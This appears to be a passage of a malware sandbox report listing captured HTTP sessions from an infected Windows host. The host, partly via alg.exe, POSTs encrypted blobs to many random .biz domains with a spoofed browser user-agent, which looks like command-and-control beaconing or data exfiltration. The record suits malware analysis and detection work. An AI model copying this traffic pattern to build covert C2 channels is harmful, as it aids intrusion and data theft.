Session ID | Source IP | Source Port | Destination IP | Destination Port
129 | 192.168.2.10 | 50108 | 34.211.97.45 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:36.115287066 CET | 351 | OUT | POST /cetkmiomtp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:36.115287066 CET | 834 | OUT | Data Raw: f9 5f 4a 64 f7 4a 1a 80 36 03 00 00 18 75 b1 f4 11 48 eb 9c 7a e6 bc 8c 99 fa 45 6d ef 55 ce 10 58 a1 f7 6a db b4 7d bb d6 ba e4 eb 52 1a ab 07 fb 8f 80 84 a1 d0 32 b5 23 d9 66 7b 46 96 33 4b 62 1a 7f 02 00 27 ee 1a fa fc 24 3f b2 b8 10 72 2a d9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _JdJ6uHzEmUXj}R2#f{F3Kb'$?r*2g}ucaunZGEKvv~C.!Rx2<jc<2#0)T^Zr!irLJpLZ]Y#.{D6xy?Wne5e
Nov 18, 2024 09:59:36.958697081 CET | 413 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=438a6020514eb9ea4f0ab6df6edb22ef|155.94.241.187|1731920376|1731920376|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
130 | 192.168.2.10 | 50109 | 54.244.188.177 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:36.172991991 CET | 356 | OUT | POST /qaurkicngfeyta HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ecxbwt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:36.173007965 CET | 778 | OUT | Data Raw: 66 4f 4b 9e 80 3e 03 22 fe 02 00 00 5f 9e 24 46 3c f1 74 ee 7d da c9 ce 03 65 0a 2f 3f 45 a7 df 6c f9 72 b8 c5 77 da af 1a ed 39 e5 98 c0 ec 6c ee 2c 2a 25 7e 63 3d 59 01 a6 51 91 59 a5 2e 88 66 a8 0a 09 be e7 3f e5 94 2d e6 34 03 74 eb 6d 54 74
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: fOK>"_$F<t}e/?Elrw9l,*%~c=YQY.f?-4tmTt5-1&Q0`_!D,f)NUmp~QmzL!x%ie8 :` 1rTD(k$21dLU1'TV[/<rj'zDb.L}
Nov 18, 2024 09:59:37.018814087 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:36 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=9e41c4446adb51c84a462f89abced68f|155.94.241.187|1731920376|1731920376|0|1|0; path=/; domain=.ecxbwt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
131 | 192.168.2.10 | 50110 | 47.129.31.212 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:36.979166985 CET | 346 | OUT | POST /rstn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mnjmhp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
Nov 18, 2024 09:59:36.979301929 CET | 834 | OUT | Data Raw: 23 17 78 0b dc bb 5d 2b 36 03 00 00 ca 12 49 77 6f dd a9 9e 53 3a 8d 22 81 fd 6f 9b 94 7d f6 b4 bf e1 c8 76 f7 3e c6 86 a4 48 a7 28 1c b1 20 71 ab 4f 6e 38 c5 88 59 b7 d3 8c c3 80 e0 16 31 c3 27 79 ec 55 34 a7 50 8b 10 c1 1e da 69 93 40 a4 73 46
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: #x]+6IwoS:"o}v>H( qOn8Y1'yU4Pi@sFzMR-?@C4c%{b25}Bk&fgj>85^SA59SOIJN~9&m!_*grTsB|m{Ashz>I4iie
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:38.476994991 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:38 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=ad3f3eac3761f174f766f80bd708b55f|155.94.241.187|1731920378|1731920378|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
132 | 192.168.2.10 | 50111 | 18.246.231.120 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:37.316297054 CET | 346 | OUT | POST /kafps HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pectx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:37.316323042 CET | 778 | OUT | Data Raw: 3c b5 0c 6e 06 31 46 f7 fe 02 00 00 31 7b a9 84 10 32 38 1a f2 13 7f c1 2a b7 7b 79 0e be f8 c5 c3 0e dc 5e 67 fc 4b c8 2d bf 94 d2 17 49 e9 bc 35 02 f0 21 a3 b6 af d3 ba 44 cc ce e2 1c 35 b3 47 1b 8c 84 6f 11 28 5f 70 d5 b0 22 96 9a 03 26 e8 51
Data Ascii: <n1F1{28*{y^gK-I5!D5Go(_p"&Q+Eo`YMl;)?lvSkJ[0^w.I}}u}xL3[:1OKn|s. ,JnGK+'=hr_@]o=<%o/wT
Nov 18, 2024 09:59:38.162082911 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:38 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2cc779b7e696e3ea020fc76f52b42509|155.94.241.187|1731920378|1731920378|0|1|0; path=/; domain=.pectx.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
133 | 192.168.2.10 | 50112 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:38.416376114 CET | 354 | OUT | POST /tfidpljjhw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: zyiexezl.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:38.416405916 CET | 778 | OUT | Data Raw: ad 8b 8f 54 85 a3 a3 46 fe 02 00 00 b8 a8 ee 2d 12 4c 47 0c c9 fe 81 56 01 ba e4 48 2e e3 c2 1c 27 72 5a 84 a0 b7 2e 7d 36 60 16 d9 84 40 bc 46 f6 60 3c 5a 16 29 a4 9c 0b 2c 0c 6f 88 14 8d c5 f2 c8 d4 bd fe e1 8d 8c 70 12 27 be 3c 47 27 3a 87 7c
Data Ascii: TF-LGVH.'rZ.}6`@F`<Z),op'<G':|(?mm|H~C-|J|Yk896<|HkQJ/o^N>J~78h;z11%s>(|>6zBy*GXK8JuX08Lz?[GN
Nov 18, 2024 09:59:39.091928005 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1325a4e98206430828d521252e18140c|155.94.241.187|1731920379|1731920379|0|1|0; path=/; domain=.zyiexezl.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
134 | 192.168.2.10 | 50113 | 18.208.156.248 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:38.495194912 CET | 355 | OUT | POST /fqteasckvt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:38.495480061 CET | 834 | OUT | Data Raw: 79 cf dc fb 7b 55 e9 36 36 03 00 00 1c ca 80 c4 f1 e1 69 5a ae c9 c0 11 fd e0 06 50 3a 2c e6 7c 48 1c 80 41 6b 95 93 6a 01 a7 7f 42 bc 57 08 b2 4a 3c 15 10 bd 56 5b 07 3e 15 9a 03 da 96 e4 cb bc 2c c8 21 14 c8 98 19 09 ad 15 7b 3f 91 60 08 be ab
Data Ascii: y{U66iZP:,|HAkjBWJ<V[>,!{?`+5j<D^sSc=:NV:oC3Kki3Vr[b>;~TW=FA{7!W#ie)J
Nov 18, 2024 09:59:39.169465065 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=bb700ede9bb6d36bdb010367f1ec37e7|155.94.241.187|1731920379|1731920379|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
135 | 192.168.2.10 | 50114 | 13.251.16.150 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:39.196141958 CET | 344 | OUT | POST /bj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:59:39.196160078 CET | 834 | OUT | Data Raw: 71 f0 8c 18 45 80 fe a4 36 03 00 00 73 5d a4 91 8f 25 c3 8b 81 87 79 47 57 5a f2 9c 05 de c0 bf cd 61 1c 86 67 0d af 91 9e 03 a9 65 e6 34 eb e6 66 dd 74 30 fa 04 04 73 1a 13 f9 30 44 3f b7 cf 49 27 fd 2d 3e b3 5b 7f 9e f8 f4 9b fb 5c 9a 98 f8 a6
Data Ascii: qE6s]%yGWZage4ft0s0D?I'->[\fg@Ffr{Z~M?RHKULP5dt2aw\[eNq<f2YSZreq0gw;dxjdOi>BR9%5QFoO^/"}J
Nov 18, 2024 09:59:40.632520914 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=795f2922e43c562f4e65f04f5a347424|155.94.241.187|1731920380|1731920380|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
136 | 192.168.2.10 | 50115 | 44.221.84.105 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:39.369318008 CET | 352 | OUT | POST /ahrycwbcmx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: banwyw.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:39.369334936 CET | 778 | OUT | Data Raw: 20 92 18 a5 93 3b 5a 63 fe 02 00 00 2f 3f 66 81 81 1b 21 42 99 0f 1c ca 2f 7f 70 f5 93 5e e7 09 a0 70 b3 df 82 f0 b2 a3 90 22 76 86 9c 68 5e 9f 72 8d 8c ae 34 5a db 56 1b 2d 02 68 19 52 b9 6b 78 8b 58 b9 34 e2 5a e8 39 65 02 d9 86 26 e4 81 01 71
Data Ascii: ;Zc/?f!B/p^p"vh^r4ZV-hRkxX4Z9e&q]d:"T2mo@Jb%($t}9bye[kb] a@$inSD2,1%#2u]N)_37A`F\W4s%i2/4P[q}JZ
Nov 18, 2024 09:59:40.034821033 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:59:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=399b747d6c9b09032fdd3a92ae66bf9a|155.94.241.187|1731920379|1731920379|0|1|0; path=/; domain=.banwyw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
137 | 192.168.2.10 | 50116 | 72.52.178.23 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:40.377171993 CET | 346 | OUT | POST /hg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: wxgzshna.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:59:40.377193928 CET | 778 | OUT | Data Raw: 2d f0 61 d5 51 c0 7e 13 fe 02 00 00 83 22 65 8a 0a b3 4a e5 57 cc b0 57 e8 0b 9e 59 0e 7b 47 81 fe e4 7e 35 25 d7 52 a3 9d b2 33 40 68 dc ea bd 49 e4 1c a8 51 f1 13 8a d9 1b f0 ae 39 85 d1 88 b1 4d cd 66 cf 73 1f 8b aa a5 39 b1 6b 01 a4 ee 2d 34
Data Ascii: -aQ~"eJWWY{G~5%R3@hIQ9Mfs9k-4XPH@#N~N"z[_dR->c^q6)b~8"TLk!cDM1x<XgM4zt^Tj+]@Z3LR*m`PMNceua


Session ID | Source IP | Source Port | Destination IP | Destination Port
138 | 192.168.2.10 | 50117 | 34.246.200.160 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:40.655626059 CET | 356 | OUT | POST /suewswdbcoj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.655649900 CET834OUTData Raw: fa 8b ae 33 89 c3 95 11 36 03 00 00 3b 49 43 17 ee c0 4f 50 a6 b6 20 f5 ba e0 be 3b d3 c0 bf df a0 eb 2a 04 94 d5 fe 53 42 2e 10 92 39 ef d5 ab 33 de 0f 41 cb f7 ef 52 2b 4d e3 e6 0d 33 99 5e d2 fa b4 36 8d 28 fd 8f 51 55 60 a1 7d e9 ae e4 7a 5e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 36;ICOP ;*SB.93AR+M3^6(QU`}z^:gyQV:,OW3%\7t9{VH:|,93_^W&7g$gz7e_]L.euf]8tJfD#s"'6h
Nov 18, 2024 09:59:41.624903917 CET | 417 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=70198797f976b84256cf63d09403d988|155.94.241.187|1731920381|1731920381|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
139 | 192.168.2.10 | 50118 | 72.52.178.23 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:41.147953987 CET | 349 | OUT | POST /qjhbu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.147967100 CET778OUTData Raw: 24 f9 0f bd d4 58 e6 99 fe 02 00 00 28 5c 3a 4b 56 65 fb ba ff ab 86 2f 6e da 4b 5a 02 c3 d1 a5 5e 54 87 16 2e ba 3e d7 39 96 44 5c 20 61 73 6f 13 e0 9c 31 8e c1 12 18 36 93 9c 2f ed 45 b6 92 b0 3c 30 90 9c b2 cb 70 b6 54 29 e0 02 43 17 69 fb ed
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $X(\:KVe/nKZ^T.>9D\ aso16/E<0pT)Ci?"M69.D:a:oENHxV/Fz g3\n)VMyXZxp9@FV-E)BEj|['7"%;'>hU)O


Session ID | Source IP | Source Port | Destination IP | Destination Port
140 | 192.168.2.10 | 50119 | 18.141.10.107 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:41.643486977 CET | 351 | OUT | POST /lxqioayc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.643496990 CET834OUTData Raw: 87 bb 16 90 2e 21 11 5b 36 03 00 00 a8 1c 3c 10 c9 39 4d b2 2a 91 76 6d ac 2a 63 5c 41 9c 2d 3c 7d 1c de e1 ce 40 64 b8 41 13 33 e3 05 00 a4 c8 98 cc 21 a8 cd 0f ef 66 7b 77 c5 f3 88 88 75 27 4f 23 7a b4 40 12 50 5e 59 cc 4e 00 93 69 7e 18 73 ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .![6<9M*vm*c\A-<}@dA3!f{wu'O#z@P^YNi~sm\|05V@GVd},|0|;_f8luK9fStSB2a)&c1XYHqa=zR&c0n>U6$]U4qtH70CM
Nov 18, 2024 09:59:43.106554031 CET | 415 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fe6b6dbf45ce5009b53030923d48a235|155.94.241.187|1731920382|1731920382|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
141 | 192.168.2.10 | 50120 | 44.221.84.105 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:59:42.079713106 CET | 351 | OUT | POST /ryyevidfy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
Nov 18, 2024 09:59:42.079735041 CET  778  OUT  Data Raw: 7a da ef 03 fe d4 b0 f9 fe 02 00 00 c1 38 9e e2 b4 8e 89 38 9e 9b 64 b7 17 e3 35 c5 d3 1f 09 18 b0 d1 be 71 56 52 eb d3 48 d0 5c 34 ae 5d 9d cd 27 50 98 af ab 64 b4 df 06 ec a2 2b 2c 87 73 35 61 df 2c 0e af fa 3b b1 b7 d7 bf d0 cf 25 bf 1b 69 22
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z88d5qVRH\4]'Pd+,s5a,;%i"/"3wXgM<cAsj;a_m]O5$D *"0Vjk#*Fiyxd)!D6+)-vIiiD&h;">2i4-7iA.Z}W
Nov 18, 2024 09:59:42.751473904 CET  414  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5086fbab4b14f97125fc515dfda356c0|155.94.241.187|1731920382|1731920382|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
